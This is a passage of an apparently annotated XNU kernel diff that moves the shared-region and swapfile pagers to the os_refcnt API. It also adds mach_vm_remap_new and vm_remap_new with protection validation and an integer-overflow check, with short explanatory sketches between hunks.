-       struct memory_object   srp_header;          /* mandatory generic header */
+       struct memory_object    srp_header;          /* mandatory generic header */
 
        /* pager-specific data */
        queue_chain_t           srp_queue;          /* next & prev pagers */
-       uint32_t                srp_ref_count;      /* active uses */
+#if MEMORY_OBJECT_HAS_REFCOUNT
+#define srp_ref_count           srp_header.mo_ref
+#else
+       os_ref_atomic_t         srp_ref_count;      /* active uses */
+#endif
        bool                    srp_is_mapped;      /* has active mappings */
        bool                    srp_is_ready;       /* is this pager ready? */
        vm_object_t             srp_backing_object; /* VM object for shared cache */
@@ -520,7 +524,7 @@ shared_region_pager_data_request(
 
        pager = shared_region_pager_lookup(mem_obj);
        assert(pager->srp_is_ready);
-       assert(pager->srp_ref_count > 1); /* pager is alive */
+       assert(os_ref_get_count_raw(&pager->srp_ref_count) > 1); /* pager is alive */
        assert(pager->srp_is_mapped); /* pager is mapped */
 
        PAGER_DEBUG(PAGER_PAGEIN, ("shared_region_pager_data_request: %p, %llx, %x, %x, pager %p\n", mem_obj, offset, length, protection_required, pager));
@@ -545,7 +549,7 @@ shared_region_pager_data_request(
                retval = kr;
                goto done;
        }
-       dst_object = mo_control->moc_object;
+       dst_object = memory_object_control_to_vm_object(mo_control);
        assert(dst_object != VM_OBJECT_NULL);
 
        /*
@@ -842,8 +846,7 @@ shared_region_pager_reference(
        pager = shared_region_pager_lookup(mem_obj);
 
        lck_mtx_lock(&shared_region_pager_lock);
-       assert(pager->srp_ref_count > 0);
-       pager->srp_ref_count++;
+       os_ref_retain_locked_raw(&pager->srp_ref_count, NULL);
        lck_mtx_unlock(&shared_region_pager_lock);
 }
 
@@ -890,7 +893,7 @@ shared_region_pager_terminate_internal(
 {
        assert(pager->srp_is_ready);
        assert(!pager->srp_is_mapped);
-       assert(pager->srp_ref_count == 1);
+       assert(os_ref_get_count_raw(&pager->srp_ref_count) == 1);
 
        if (pager->srp_backing_object != VM_OBJECT_NULL) {
                vm_object_deallocate(pager->srp_backing_object);
@@ -914,6 +917,7 @@ shared_region_pager_deallocate_internal(
 {
        boolean_t       needs_trimming;
        int             count_unmapped;
+       os_ref_count_t  ref_count;
 
        if (!locked) {
                lck_mtx_lock(&shared_region_pager_lock);
@@ -924,10 +928,9 @@ shared_region_pager_deallocate_internal(
        needs_trimming = (count_unmapped > shared_region_pager_cache_limit);
 
        /* drop a reference on this pager */
-       assert(pager->srp_ref_count > 0);
-       pager->srp_ref_count--;
+       ref_count = os_ref_release_locked_raw(&pager->srp_ref_count, NULL);
 
-       if (pager->srp_ref_count == 1) {
+       if (ref_count == 1) {
                /*
                 * Only the "named" reference is left, which means that
                 * no one is really holding on to this pager anymore.
@@ -937,7 +940,7 @@ shared_region_pager_deallocate_internal(
                /* the pager is all ours: no need for the lock now */
                lck_mtx_unlock(&shared_region_pager_lock);
                shared_region_pager_terminate_internal(pager);
-       } else if (pager->srp_ref_count == 0) {
+       } else if (ref_count == 0) {
                /*
                 * Dropped the existence reference;  the memory object has
                 * been terminated.  Do some final cleanup and release the
@@ -1052,10 +1055,10 @@ shared_region_pager_map(
 
        lck_mtx_lock(&shared_region_pager_lock);
        assert(pager->srp_is_ready);
-       assert(pager->srp_ref_count > 0); /* pager is alive */
+       assert(os_ref_get_count_raw(&pager->srp_ref_count) > 0); /* pager is alive */
        if (!pager->srp_is_mapped) {
                pager->srp_is_mapped = TRUE;
-               pager->srp_ref_count++;
+               os_ref_retain_locked_raw(&pager->srp_ref_count, NULL);
                shared_region_pager_count_mapped++;
        }
        lck_mtx_unlock(&shared_region_pager_lock);
@@ -1133,7 +1136,7 @@ shared_region_pager_lookup(
 
        assert(mem_obj->mo_pager_ops == &shared_region_pager_ops);
        pager = (shared_region_pager_t)(uintptr_t) mem_obj;
-       assert(pager->srp_ref_count > 0);
+       assert(os_ref_get_count_raw(&pager->srp_ref_count) > 0);
        return pager;
 }
 
@@ -1173,8 +1176,8 @@ shared_region_pager_create(
        pager->srp_header.mo_control = MEMORY_OBJECT_CONTROL_NULL;
 
        pager->srp_is_ready = FALSE;/* not ready until it has a "name" */
-       pager->srp_ref_count = 1;   /* existence reference (for the cache) */
-       pager->srp_ref_count++;     /* for the caller */
+       /* existence reference (for the cache) + 1 for the caller */
+       os_ref_init_count_raw(&pager->srp_ref_count, NULL, 2);
        pager->srp_is_mapped = FALSE;
        pager->srp_backing_object = backing_object;
        pager->srp_backing_offset = backing_offset;
@@ -1318,7 +1321,8 @@ shared_region_pager_match(
                if (memcmp(si->si_slide_info_entry, slide_info->si_slide_info_entry, si->si_slide_info_size) != 0) {
                        continue;
                }
-               ++pager->srp_ref_count; /* the caller expects a reference on this */
+               /* the caller expects a reference on this */
+               os_ref_retain_locked_raw(&pager->srp_ref_count, NULL);
                lck_mtx_unlock(&shared_region_pager_lock);
                return (memory_object_t)pager;
        }
@@ -1366,7 +1370,7 @@ shared_region_pager_trim(void)
                /* get prev elt before we dequeue */
                prev_pager = (shared_region_pager_t)queue_prev(&pager->srp_queue);
 
-               if (pager->srp_ref_count == 2 &&
+               if (os_ref_get_count_raw(&pager->srp_ref_count) == 2 &&
                    pager->srp_is_ready &&
                    !pager->srp_is_mapped) {
                        /* this pager can be trimmed */
@@ -1401,13 +1405,13 @@ shared_region_pager_trim(void)
                    srp_queue);
                pager->srp_queue.next = NULL;
                pager->srp_queue.prev = NULL;
-               assert(pager->srp_ref_count == 2);
+               assert(os_ref_get_count_raw(&pager->srp_ref_count) == 2);
                /*
                 * We can't call deallocate_internal() because the pager
                 * has already been dequeued, but we still need to remove
                 * a reference.
                 */
-               pager->srp_ref_count--;
+               (void)os_ref_release_locked_raw(&pager->srp_ref_count, NULL);
                shared_region_pager_terminate_internal(pager);
        }
 }
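Both pager files in this commit replace hand-rolled integer reference counts with the os_refcnt "raw" API used above (os_ref_init_count_raw, os_ref_retain_locked_raw, os_ref_release_locked_raw, os_ref_get_count_raw). A compact sketch of that pattern; the struct is a stand-in, and as in the real code the caller is assumed to hold the subsystem mutex around the *_locked_raw calls.

#include <stdbool.h>
#include <os/refcnt.h>

struct sketch_pager {
        os_ref_atomic_t ref_count;
};

static void
sketch_pager_init(struct sketch_pager *p)
{
        /* one "existence" reference for the cache + one for the creating caller,
         * mirroring shared_region_pager_create() above */
        os_ref_init_count_raw(&p->ref_count, NULL, 2);
}

static void
sketch_pager_retain_locked(struct sketch_pager *p)
{
        os_ref_retain_locked_raw(&p->ref_count, NULL);
}

static bool
sketch_pager_release_locked(struct sketch_pager *p)
{
        /* the return value is the new count: 1 means only the existence
         * reference remains (start termination), 0 means free the object */
        return os_ref_release_locked_raw(&p->ref_count, NULL) == 0;
}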
index 388d0fb569162029fc4e03f27e106fd0a03c3dfb..677b2b0ce13b24f9d91be0ce3b381355cbcda48c 100644 (file)
@@ -137,13 +137,17 @@ const struct memory_object_pager_ops swapfile_pager_ops = {
  */
 typedef struct swapfile_pager {
        /* mandatory generic header */
-       struct memory_object swp_pgr_hdr;
+       struct memory_object    swp_pgr_hdr;
 
        /* pager-specific data */
        queue_chain_t           pager_queue;    /* next & prev pagers */
-       unsigned int            ref_count;      /* reference count */
-       boolean_t               is_ready;       /* is this pager ready ? */
-       boolean_t               is_mapped;      /* is this pager mapped ? */
+#if MEMORY_OBJECT_HAS_REFCOUNT
+#define swp_pgr_hdr_ref         swp_pgr_hdr.mo_ref
+#else
+       os_ref_atomic_t         swp_pgr_hdr_ref;      /* reference count */
+#endif
+       bool                    is_ready;       /* is this pager ready ? */
+       bool                    is_mapped;      /* is this pager mapped ? */
        struct vnode            *swapfile_vnode;/* the swapfile's vnode */
 } *swapfile_pager_t;
 #define SWAPFILE_PAGER_NULL     ((swapfile_pager_t) NULL)
@@ -320,7 +324,7 @@ swapfile_pager_data_request(
 
        pager = swapfile_pager_lookup(mem_obj);
        assert(pager->is_ready);
-       assert(pager->ref_count > 1); /* pager is alive and mapped */
+       assert(os_ref_get_count_raw(&pager->swp_pgr_hdr_ref) > 1); /* pager is alive and mapped */
 
        PAGER_DEBUG(PAGER_PAGEIN, ("swapfile_pager_data_request: %p, %llx, %x, %x, pager %p\n", mem_obj, offset, length, protection_required, pager));
 
@@ -344,7 +348,7 @@ swapfile_pager_data_request(
                retval = kr;
                goto done;
        }
-       dst_object = mo_control->moc_object;
+       dst_object = memory_object_control_to_vm_object(mo_control);
        assert(dst_object != VM_OBJECT_NULL);
 
 
@@ -482,8 +486,7 @@ swapfile_pager_reference(
        pager = swapfile_pager_lookup(mem_obj);
 
        lck_mtx_lock(&swapfile_pager_lock);
-       assert(pager->ref_count > 0);
-       pager->ref_count++;
+       os_ref_retain_locked_raw(&pager->swp_pgr_hdr_ref, NULL);
        lck_mtx_unlock(&swapfile_pager_lock);
 }
 
@@ -552,14 +555,16 @@ swapfile_pager_deallocate_internal(
        swapfile_pager_t        pager,
        boolean_t               locked)
 {
+       os_ref_count_t ref_count;
+
        if (!locked) {
                lck_mtx_lock(&swapfile_pager_lock);
        }
 
        /* drop a reference on this pager */
-       pager->ref_count--;
+       ref_count = os_ref_release_locked_raw(&pager->swp_pgr_hdr_ref, NULL);
 
-       if (pager->ref_count == 1) {
+       if (ref_count == 1) {
                /*
                 * Only the "named" reference is left, which means that
                 * no one is really holding on to this pager anymore.
@@ -569,7 +574,7 @@ swapfile_pager_deallocate_internal(
                /* the pager is all ours: no need for the lock now */
                lck_mtx_unlock(&swapfile_pager_lock);
                swapfile_pager_terminate_internal(pager);
-       } else if (pager->ref_count == 0) {
+       } else if (ref_count == 0) {
                /*
                 * Dropped the existence reference;  the memory object has
                 * been terminated.  Do some final cleanup and release the
@@ -657,7 +662,7 @@ swapfile_pager_map(
 
        lck_mtx_lock(&swapfile_pager_lock);
        assert(pager->is_ready);
-       assert(pager->ref_count > 0); /* pager is alive */
+       assert(os_ref_get_count_raw(&pager->swp_pgr_hdr_ref) > 0); /* pager is alive */
        if (pager->is_mapped == FALSE) {
                /*
                 * First mapping of this pager:  take an extra reference
@@ -665,7 +670,7 @@ swapfile_pager_map(
                 * are removed.
                 */
                pager->is_mapped = TRUE;
-               pager->ref_count++;
+               os_ref_retain_locked_raw(&pager->swp_pgr_hdr_ref, NULL);
        }
        lck_mtx_unlock(&swapfile_pager_lock);
 
@@ -716,7 +721,7 @@ swapfile_pager_lookup(
 
        assert(mem_obj->mo_pager_ops == &swapfile_pager_ops);
        __IGNORE_WCASTALIGN(pager = (swapfile_pager_t) mem_obj);
-       assert(pager->ref_count > 0);
+       assert(os_ref_get_count_raw(&pager->swp_pgr_hdr_ref) > 0);
        return pager;
 }
 
@@ -745,7 +750,7 @@ swapfile_pager_create(
        pager->swp_pgr_hdr.mo_control = MEMORY_OBJECT_CONTROL_NULL;
 
        pager->is_ready = FALSE;/* not ready until it has a "name" */
-       pager->ref_count = 1;   /* setup reference */
+       os_ref_init_raw(&pager->swp_pgr_hdr_ref, NULL);   /* setup reference */
        pager->is_mapped = FALSE;
        pager->swapfile_vnode = vp;
 
@@ -762,7 +767,7 @@ swapfile_pager_create(
        if (!queue_end(&swapfile_pager_queue,
            (queue_entry_t) pager2)) {
                /* while we hold the lock, transfer our setup ref to winner */
-               pager2->ref_count++;
+               os_ref_retain_locked_raw(&pager2->swp_pgr_hdr_ref, NULL);
                /* we lost the race, down with the loser... */
                lck_mtx_unlock(&swapfile_pager_lock);
                pager->swapfile_vnode = NULL;
@@ -831,7 +836,7 @@ swapfile_pager_setup(
                pager = SWAPFILE_PAGER_NULL;
        } else {
                /* make sure pager doesn't disappear */
-               pager->ref_count++;
+               os_ref_retain_raw(&pager->swp_pgr_hdr_ref, NULL);
        }
 
        lck_mtx_unlock(&swapfile_pager_lock);
index cda7e0ba134db0a9f0ccf5e0af70a126c1300574..6e288f8c7009b01346d3ad4725c3f1cb85829fd0 100644 (file)
@@ -892,17 +892,19 @@ vm_test_map_copy_adjust_to_target(void)
        mach_memory_entry_port_release(mem_entry);
 
        /* create 4k copy map */
+       curprot = VM_PROT_NONE;
+       maxprot = VM_PROT_NONE;
        kr = vm_map_copy_extract(map4k, addr4k, 0x3000,
-           VM_PROT_READ, FALSE,
-           &copy4k, &curprot, &maxprot,
+           FALSE, &copy4k, &curprot, &maxprot,
            VM_INHERIT_DEFAULT, VM_MAP_KERNEL_FLAGS_NONE);
        assert(kr == KERN_SUCCESS);
        assert(copy4k->size == 0x3000);
 
        /* create 16k copy map */
+       curprot = VM_PROT_NONE;
+       maxprot = VM_PROT_NONE;
        kr = vm_map_copy_extract(map16k, addr16k, 0x4000,
-           VM_PROT_READ, FALSE,
-           &copy16k, &curprot, &maxprot,
+           FALSE, &copy16k, &curprot, &maxprot,
            VM_INHERIT_DEFAULT, VM_MAP_KERNEL_FLAGS_NONE);
        assert(kr == KERN_SUCCESS);
        assert(copy16k->size == 0x4000);
index 360289f4757b7d1e071b0c2e35beb56d544edcec..2682dfaaf1b733d15953ffcf463aa4967420961f 100644 (file)
@@ -1184,6 +1184,91 @@ vm_map_kernel(
        return kr;
 }
 
+/*
+ * mach_vm_remap_new -
+ * Behaves like mach_vm_remap, except that VM_FLAGS_RETURN_DATA_ADDR is always set
+ * and {cur,max}_protection are in/out.
+ */
+kern_return_t
+mach_vm_remap_new_external(
+       vm_map_t                target_map,
+       mach_vm_offset_t        *address,
+       mach_vm_size_t  size,
+       mach_vm_offset_t        mask,
+       int                     flags,
+       mach_port_t             src_tport,
+       mach_vm_offset_t        memory_address,
+       boolean_t               copy,
+       vm_prot_t               *cur_protection,   /* IN/OUT */
+       vm_prot_t               *max_protection,   /* IN/OUT */
+       vm_inherit_t            inheritance)
+{
+       vm_tag_t tag;
+       vm_map_offset_t         map_addr;
+       kern_return_t           kr;
+       vm_map_t src_map;
+
+       flags |= VM_FLAGS_RETURN_DATA_ADDR;
+       VM_GET_FLAGS_ALIAS(flags, tag);
+
+       /* filter out any kernel-only flags */
+       if (flags & ~VM_FLAGS_USER_REMAP) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       if (target_map == VM_MAP_NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       if ((*cur_protection & ~VM_PROT_ALL) ||
+           (*max_protection & ~VM_PROT_ALL) ||
+           (*cur_protection & *max_protection) != *cur_protection) {
+               return KERN_INVALID_ARGUMENT;
+       }
+       if ((*max_protection & (VM_PROT_WRITE | VM_PROT_EXECUTE)) ==
+           (VM_PROT_WRITE | VM_PROT_EXECUTE)) {
+               /*
+                * XXX FBDP TODO
+                * enforce target's "wx" policies
+                */
+               return KERN_PROTECTION_FAILURE;
+       }
+
+       if (copy || *max_protection == VM_PROT_READ || *max_protection == VM_PROT_NONE) {
+               src_map = convert_port_to_map_read(src_tport);
+       } else {
+               src_map = convert_port_to_map(src_tport);
+       }
+
+       if (src_map == VM_MAP_NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       map_addr = (vm_map_offset_t)*address;
+
+       kr = vm_map_remap(target_map,
+           &map_addr,
+           size,
+           mask,
+           flags,
+           VM_MAP_KERNEL_FLAGS_NONE,
+           tag,
+           src_map,
+           memory_address,
+           copy,
+           cur_protection,    /* IN/OUT */
+           max_protection,    /* IN/OUT */
+           inheritance);
+
+       *address = map_addr;
+       vm_map_deallocate(src_map);
+
+       if (kr == KERN_SUCCESS) {
+               ipc_port_release_send(src_tport);  /* consume on success */
+       }
+       return kr;
+}
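A hedged usage sketch of the new in/out protection contract as seen from a user process, assuming the MIG stub mach_vm_remap_new() mirrors the kernel _external signature above; the source port, address, and size are placeholders.

#include <mach/mach.h>
#include <mach/mach_vm.h>

kern_return_t
remap_read_only(mach_port_t src_port, mach_vm_address_t src_addr,
    mach_vm_size_t size, mach_vm_address_t *out_addr)
{
        /* With mach_vm_remap_new() the caller requests protections up front;
         * the old mach_vm_remap() only reported them on the way out. */
        vm_prot_t cur = VM_PROT_READ;
        vm_prot_t max = VM_PROT_READ;

        *out_addr = 0;
        return mach_vm_remap_new(mach_task_self(), out_addr, size, /* mask */ 0,
            VM_FLAGS_ANYWHERE, src_port, src_addr, /* copy */ FALSE,
            &cur, &max, VM_INHERIT_NONE);
}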
+
 /*
  * mach_vm_remap -
  * Remap a range of memory from one task into another,
@@ -1201,8 +1286,8 @@ mach_vm_remap_external(
        vm_map_t                src_map,
        mach_vm_offset_t        memory_address,
        boolean_t               copy,
-       vm_prot_t               *cur_protection,
-       vm_prot_t               *max_protection,
+       vm_prot_t               *cur_protection,    /* OUT */
+       vm_prot_t               *max_protection,    /* OUT */
        vm_inherit_t            inheritance)
 {
        vm_tag_t tag;
@@ -1223,8 +1308,8 @@ mach_vm_remap_kernel(
        vm_map_t                src_map,
        mach_vm_offset_t        memory_address,
        boolean_t               copy,
-       vm_prot_t               *cur_protection,
-       vm_prot_t               *max_protection,
+       vm_prot_t               *cur_protection,   /* OUT */
+       vm_prot_t               *max_protection,   /* OUT */
        vm_inherit_t            inheritance)
 {
        vm_map_offset_t         map_addr;
@@ -1241,6 +1326,9 @@ mach_vm_remap_kernel(
 
        map_addr = (vm_map_offset_t)*address;
 
+       *cur_protection = VM_PROT_NONE;
+       *max_protection = VM_PROT_NONE;
+
        kr = vm_map_remap(target_map,
            &map_addr,
            size,
@@ -1251,13 +1339,98 @@ mach_vm_remap_kernel(
            src_map,
            memory_address,
            copy,
-           cur_protection,
-           max_protection,
+           cur_protection,    /* IN/OUT */
+           max_protection,    /* IN/OUT */
            inheritance);
        *address = map_addr;
        return kr;
 }
 
+/*
+ * vm_remap_new -
+ * Behaves like vm_remap, except that VM_FLAGS_RETURN_DATA_ADDR is always set
+ * and {cur,max}_protection are in/out.
+ */
+kern_return_t
+vm_remap_new_external(
+       vm_map_t                target_map,
+       vm_offset_t             *address,
+       vm_size_t               size,
+       vm_offset_t             mask,
+       int                     flags,
+       mach_port_t             src_tport,
+       vm_offset_t             memory_address,
+       boolean_t               copy,
+       vm_prot_t               *cur_protection,       /* IN/OUT */
+       vm_prot_t               *max_protection,       /* IN/OUT */
+       vm_inherit_t            inheritance)
+{
+       vm_tag_t tag;
+       vm_map_offset_t         map_addr;
+       kern_return_t           kr;
+       vm_map_t src_map;
+
+       flags |= VM_FLAGS_RETURN_DATA_ADDR;
+       VM_GET_FLAGS_ALIAS(flags, tag);
+
+       /* filter out any kernel-only flags */
+       if (flags & ~VM_FLAGS_USER_REMAP) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       if (target_map == VM_MAP_NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       if ((*cur_protection & ~VM_PROT_ALL) ||
+           (*max_protection & ~VM_PROT_ALL) ||
+           (*cur_protection & *max_protection) != *cur_protection) {
+               return KERN_INVALID_ARGUMENT;
+       }
+       if ((*max_protection & (VM_PROT_WRITE | VM_PROT_EXECUTE)) ==
+           (VM_PROT_WRITE | VM_PROT_EXECUTE)) {
+               /*
+                * XXX FBDP TODO
+                * enforce target's "wx" policies
+                */
+               return KERN_PROTECTION_FAILURE;
+       }
+
+       if (copy || *max_protection == VM_PROT_READ || *max_protection == VM_PROT_NONE) {
+               src_map = convert_port_to_map_read(src_tport);
+       } else {
+               src_map = convert_port_to_map(src_tport);
+       }
+
+       if (src_map == VM_MAP_NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       map_addr = (vm_map_offset_t)*address;
+
+       kr = vm_map_remap(target_map,
+           &map_addr,
+           size,
+           mask,
+           flags,
+           VM_MAP_KERNEL_FLAGS_NONE,
+           tag,
+           src_map,
+           memory_address,
+           copy,
+           cur_protection,   /* IN/OUT */
+           max_protection,   /* IN/OUT */
+           inheritance);
+
+       *address = CAST_DOWN(vm_offset_t, map_addr);
+       vm_map_deallocate(src_map);
+
+       if (kr == KERN_SUCCESS) {
+               ipc_port_release_send(src_tport); /* consume on success */
+       }
+       return kr;
+}
+
 /*
  * vm_remap -
  * Remap a range of memory from one task into another,
@@ -1279,8 +1452,8 @@ vm_remap_external(
        vm_map_t                src_map,
        vm_offset_t             memory_address,
        boolean_t               copy,
-       vm_prot_t               *cur_protection,
-       vm_prot_t               *max_protection,
+       vm_prot_t               *cur_protection,    /* OUT */
+       vm_prot_t               *max_protection,    /* OUT */
        vm_inherit_t            inheritance)
 {
        vm_tag_t tag;
@@ -1301,8 +1474,8 @@ vm_remap_kernel(
        vm_map_t                src_map,
        vm_offset_t             memory_address,
        boolean_t               copy,
-       vm_prot_t               *cur_protection,
-       vm_prot_t               *max_protection,
+       vm_prot_t               *cur_protection,    /* OUT */
+       vm_prot_t               *max_protection,    /* OUT */
        vm_inherit_t            inheritance)
 {
        vm_map_offset_t         map_addr;
@@ -1319,6 +1492,9 @@ vm_remap_kernel(
 
        map_addr = (vm_map_offset_t)*address;
 
+       *cur_protection = VM_PROT_NONE;
+       *max_protection = VM_PROT_NONE;
+
        kr = vm_map_remap(target_map,
            &map_addr,
            size,
@@ -1329,8 +1505,8 @@ vm_remap_kernel(
            src_map,
            memory_address,
            copy,
-           cur_protection,
-           max_protection,
+           cur_protection,   /* IN/OUT */
+           max_protection,   /* IN/OUT */
            inheritance);
        *address = CAST_DOWN(vm_offset_t, map_addr);
        return kr;
@@ -1375,8 +1551,6 @@ mach_vm_wire_kernel(
                return KERN_INVALID_HOST;
        }
 
-       assert(host_priv == &realhost);
-
        if (map == VM_MAP_NULL) {
                return KERN_INVALID_TASK;
        }
@@ -1426,8 +1600,6 @@ vm_wire(
                return KERN_INVALID_HOST;
        }
 
-       assert(host_priv == &realhost);
-
        if (map == VM_MAP_NULL) {
                return KERN_INVALID_TASK;
        }
@@ -2099,7 +2271,10 @@ mach_vm_page_range_query(
        effective_page_size = (1 << effective_page_shift);
        effective_page_mask = effective_page_size - 1;
 
-       disp_buf_req_size = (*dispositions_count * sizeof(int));
+       if (os_mul_overflow(*dispositions_count, sizeof(int), &disp_buf_req_size)) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
        start = vm_map_trunc_page(address, effective_page_mask);
        end = vm_map_round_page(address + size, effective_page_mask);
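The hunk above swaps an unchecked multiplication of the caller-supplied dispositions_count for os_mul_overflow() from <os/overflow.h>, which reports rather than wraps on overflow. A minimal sketch of the same checked-size pattern; the function name is illustrative.

#include <os/overflow.h>
#include <stddef.h>

/* Returns 0 and writes the byte count on success, or -1 if
 * count * sizeof(int) would overflow a size_t. */
static int
checked_int_array_bytes(unsigned int count, size_t *out_bytes)
{
        size_t bytes;

        if (os_mul_overflow(count, sizeof(int), &bytes)) {
                return -1;
        }
        *out_bytes = bytes;
        return 0;
}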
 
@@ -2296,7 +2471,7 @@ kern_return_t
 mach_make_memory_entry_64(
        vm_map_t                target_map,
        memory_object_size_t    *size,
-       memory_object_offset_t offset,
+       memory_object_offset_t  offset,
        vm_prot_t               permission,
        ipc_port_t              *object_handle,
        ipc_port_t              parent_handle)
@@ -2674,7 +2849,6 @@ mach_make_memory_entry_internal(
                vm_prot_t       cur_prot, max_prot;
                vm_map_kernel_flags_t vmk_flags;
                vm_map_entry_t parent_copy_entry;
-               vm_prot_t required_protection;
 
                if (target_map == VM_MAP_NULL) {
                        DEBUG4K_MEMENTRY("map %p offset 0x%llx size 0x%llx prot 0x%x -> entry %p kr 0x%x\n", target_map, offset, *size, permission, user_entry, KERN_INVALID_TASK);
@@ -2685,6 +2859,42 @@ mach_make_memory_entry_internal(
                vmk_flags = VM_MAP_KERNEL_FLAGS_NONE;
                parent_copy_entry = VM_MAP_ENTRY_NULL;
                if (!(permission & MAP_MEM_VM_SHARE)) {
+                       vm_map_t tmp_map, real_map;
+                       vm_map_version_t version;
+                       vm_object_t tmp_object;
+                       vm_object_offset_t obj_off;
+                       vm_prot_t prot;
+                       boolean_t wired;
+                       bool contended;
+
+                       /* resolve any pending submap copy-on-write... */
+                       if (protections & VM_PROT_WRITE) {
+                               tmp_map = target_map;
+                               vm_map_lock_read(tmp_map);
+                               kr = vm_map_lookup_locked(&tmp_map,
+                                   map_start,
+                                   protections | mask_protections,
+                                   OBJECT_LOCK_EXCLUSIVE,
+                                   &version,
+                                   &tmp_object,
+                                   &obj_off,
+                                   &prot,
+                                   &wired,
+                                   NULL,                       /* fault_info */
+                                   &real_map,
+                                   &contended);
+                               if (kr != KERN_SUCCESS) {
+                                       vm_map_unlock_read(tmp_map);
+                               } else {
+                                       vm_object_unlock(tmp_object);
+                                       vm_map_unlock_read(tmp_map);
+                                       if (real_map != tmp_map) {
+                                               vm_map_unlock_read(real_map);
+                                       }
+                               }
+                       }
+                       /* ... and carry on */
+
                        /* stop extracting if VM object changes */
                        vmk_flags.vmkf_copy_single_object = TRUE;
                        if ((permission & MAP_MEM_NAMED_REUSE) &&
@@ -2718,15 +2928,16 @@ mach_make_memory_entry_internal(
                         * caller is asking for whichever protections are
                         * available: no required protections.
                         */
-                       required_protection = VM_PROT_NONE;
+                       cur_prot = VM_PROT_NONE;
+                       max_prot = VM_PROT_NONE;
                } else {
                        /*
                         * Caller wants a memory entry with "protections".
                         * Make sure we extract only memory that matches that.
                         */
-                       required_protection = protections;
+                       cur_prot = protections;
+                       max_prot = protections;
                }
-               cur_prot = VM_PROT_ALL;
                if (target_map->pmap == kernel_pmap) {
                        /*
                         * Get "reserved" map entries to avoid deadlocking
@@ -2743,7 +2954,6 @@ mach_make_memory_entry_internal(
                kr = vm_map_copy_extract(target_map,
                    map_start,
                    map_size,
-                   required_protection,
                    FALSE,                      /* copy */
                    &copy,
                    &cur_prot,
@@ -2758,7 +2968,6 @@ mach_make_memory_entry_internal(
                        return kr;
                }
                assert(copy != VM_MAP_COPY_NULL);
-               assert((cur_prot & required_protection) == required_protection);
 
                if (mask_protections) {
                        /*
@@ -2780,6 +2989,9 @@ mach_make_memory_entry_internal(
                         * We want exactly "original_protections"
                         * out of "cur_prot".
                         */
+                       assert((cur_prot & protections) == protections);
+                       assert((max_prot & protections) == protections);
+                       /* XXX FBDP TODO: no longer needed? */
                        if ((cur_prot & protections) != protections) {
                                if (VM_MAP_PAGE_SHIFT(target_map) < PAGE_SHIFT) {
 //                                     panic("DEBUG4K %s:%d kr 0x%x\n", __FUNCTION__, __LINE__, KERN_PROTECTION_FAILURE);
@@ -2948,10 +3160,8 @@ mach_make_memory_entry_internal(
 
        if (parent_entry->is_sub_map) {
                vm_map_t map = parent_entry->backing.map;
+               vm_map_reference(map);
                user_entry->backing.map = map;
-               lck_mtx_lock(&map->s_lock);
-               os_ref_retain_locked(&map->map_refcnt);
-               lck_mtx_unlock(&map->s_lock);
        } else {
                object = vm_named_entry_to_vm_object(parent_entry);
                assert(object != VM_OBJECT_NULL);
@@ -3516,7 +3726,7 @@ mach_memory_entry_phys_page_offset(
                return KERN_INVALID_ARGUMENT;
        }
 
-       mem_entry = (vm_named_entry_t) entry_port->ip_kobject;
+       mem_entry = (vm_named_entry_t) ipc_kobject_get(entry_port);
 
        named_entry_lock(mem_entry);
 
@@ -3562,7 +3772,7 @@ mach_memory_entry_map_size(
                return KERN_INVALID_ARGUMENT;
        }
 
-       mem_entry = (vm_named_entry_t) entry_port->ip_kobject;
+       mem_entry = (vm_named_entry_t) ipc_kobject_get(entry_port);
        named_entry_lock(mem_entry);
 
        if (mem_entry->is_sub_map) {
@@ -4234,8 +4444,8 @@ mach_vm_remap(
        vm_map_t                src_map,
        mach_vm_offset_t        memory_address,
        boolean_t               copy,
-       vm_prot_t               *cur_protection,
-       vm_prot_t               *max_protection,
+       vm_prot_t               *cur_protection,   /* OUT */
+       vm_prot_t               *max_protection,   /* OUT */
        vm_inherit_t            inheritance)
 {
        return mach_vm_remap_external(target_map, address, size, mask, flags, src_map, memory_address,
index 9569ed36c333baef09187c49bcc97049ea6de272..c262c406717615111fbcda8350f56b361b6146ed 100644 (file)
@@ -206,7 +206,7 @@ copyio(int copy_type, user_addr_t user_addr, char *kernel_addr,
                         * Size of elements in the permanent zone is not saved as a part of the
                         * zone's info
                         */
-                       if (__improbable(src_zone && !src_zone->permanent &&
+                       if (__improbable(src_zone && !src_zone->z_permanent &&
                            kernel_buf_size < nbytes)) {
                                panic("copyio: kernel buffer %p has size %lu < nbytes %lu", kernel_addr, kernel_buf_size, nbytes);
                        }
diff --git a/osfmk/x86_64/counter.c b/osfmk/x86_64/counter.c
new file mode 100644 (file)
index 0000000..4211024
--- /dev/null
@@ -0,0 +1,109 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+/*
+ * @OSF_COPYRIGHT@
+ */
+/*
+ * Mach Operating System
+ * Copyright (c) 1991,1990,1989,1988,1987 Carnegie Mellon University
+ * All Rights Reserved.
+ *
+ * Permission to use, copy, modify and distribute this software and its
+ * documentation is hereby granted, provided that both the copyright
